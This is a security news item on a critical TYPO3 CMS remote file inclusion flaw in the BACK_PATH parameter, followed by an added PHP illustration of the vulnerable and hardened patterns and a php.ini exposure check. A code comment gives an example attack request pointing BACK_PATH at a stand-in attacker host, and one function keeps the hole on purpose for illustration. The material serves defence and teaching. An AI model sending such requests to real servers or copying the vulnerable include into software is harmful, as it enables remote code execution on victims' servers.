TYPO3 developers warn of critical hole
The TYPO3 developer team has warned of a critical hole in the TYPO3 Content Management System (CMS) that potentially allows attackers to compromise a server. Insufficient checking of the BACK_PATH parameter used by the AbstractController.php file allows attackers to make the script include and execute PHP code fetched from a URL under their control (Remote File Inclusion). The developers report that attackers are already attempting to break into users' servers on a large scale.
TYPO3 versions 4.5.0 to 4.5.8 as well as 4.6.0 and 4.6.1 are vulnerable, but only if the PHP configuration options register_globals, allow_url_include and allow_url_fopen are all enabled. Only the last of these is enabled by default (register_globals in particular has been deprecated since PHP 5.3 and no longer exists in PHP 5.4). Administrators who cannot update immediately should ensure that at least one of the three options is disabled, which breaks the exploit chain. The developer team has provided a patch and released the corrected versions 4.5.9 and 4.6.2, which are the proper fix. As a stopgap, users can also deploy the mod_security rule described in the developers' advisory.
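The following is an added illustration, not code from TYPO3 or its advisory. It shows the general class of bug described above: a back-end script that includes a file relative to a path variable it never initialised itself, so that with register_globals enabled the variable is populated straight from the request, and with allow_url_include and allow_url_fopen enabled PHP will fetch and execute a script from an attacker-chosen URL. The hardened variant derives the path from the script's own location and refuses anything outside the installation. The function names, the hostname evil.example and the init.php target are assumptions made for the example; the three ini settings are the ones named in the article.

```php
<?php
// Added example, not TYPO3's own code. Illustrates the register_globals +
// allow_url_include + allow_url_fopen remote file inclusion pattern.

// --- Vulnerable pattern (illustrative) ---
// $BACK_PATH is expected to have been set by an earlier include. If that did
// not happen and register_globals=On, a request such as
//   /script.php?BACK_PATH=http://evil.example/
// makes PHP include http://evil.example/init.php and run whatever it returns
// (requires allow_url_include=On and allow_url_fopen=On).
function vulnerableBootstrap()
{
    global $BACK_PATH;                       // never initialised here
    require_once $BACK_PATH . 'init.php';    // attacker controls the prefix
}

// --- Hardened pattern ---
// The prefix is computed from the script's own location, never read from the
// request, and the resolved target is checked to lie inside the install root
// before it is included. This also blocks path-traversal variants.
function hardenedBootstrap()
{
    $root   = realpath(__DIR__ . '/..');                 // install root (assumed layout)
    $target = realpath(__DIR__ . '/../init.php');
    if ($root === false || $target === false
        || strpos($target, $root . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('refusing to include a file outside the install');
    }
    require_once $target;
}

// --- Configuration check ---
// Returns true only when all three conditions from the article hold, i.e. an
// unpatched installation on this server is exploitable by remote inclusion.
// On PHP >= 5.4 ini_get('register_globals') returns false because the
// directive was removed, so the check correctly reports "not exploitable".
function remoteIncludePossible(): bool
{
    $on = function (string $name): bool {
        return filter_var(ini_get($name), FILTER_VALIDATE_BOOLEAN);
    };
    return $on('register_globals') && $on('allow_url_include') && $on('allow_url_fopen');
}

if (PHP_SAPI === 'cli') {
    echo remoteIncludePossible()
        ? "remote file inclusion possible: disable register_globals or allow_url_include\n"
        : "remote file inclusion not possible with the current php.ini\n";
}
```

Run the script with the CLI PHP binary of the same installation the web server uses (for example `php -c /etc/php5/apache2/php.ini check.php`), since the CLI often reads a different php.ini than mod_php or PHP-FPM. Disabling register_globals is the most effective single change because it removes the attacker's write access to the variable in the first place; disabling allow_url_include only closes the remote variant.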